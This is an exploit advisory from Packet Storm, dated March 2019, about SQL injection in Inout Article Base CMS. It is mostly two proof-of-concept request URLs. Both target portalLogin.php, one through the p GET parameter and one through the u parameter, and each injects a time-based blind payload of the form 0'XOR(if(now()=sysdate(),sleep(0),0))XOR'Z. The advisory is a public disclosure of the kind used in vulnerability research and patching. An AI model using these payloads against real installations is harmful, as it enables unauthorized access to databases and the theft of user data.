Inout Article Base CMS SQL Injection

2019-03-22T00:00:00
ID PACKETSTORM:152198
Type packetstorm
Reporter Ahmet Umit Bayram
Modified 2019-03-22T00:00:00

Description

                                        
                                            `# Exploit Title: Inout Article Base CMS - SQL Injection  
# Date: 21.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/  
# Demo Site: http://www.inoutwebportal.com  
# Version: Lastest  
# Tested on: Kali Linux  
# CVE: N/A  
  
----- PoC 1: SQLi -----  
  
Request: http://localhost/[PATH]/articles/portalLogin.php  
Vulnerable Parameter: p (GET)  
Attack Pattern:  
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test  
  
----- PoC 2: SQLi -----  
  
Request: http://localhost/[PATH]/articles/portalLogin.php  
Vulnerable Parameter: u (GET)  
Attack Pattern:  
http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z  
`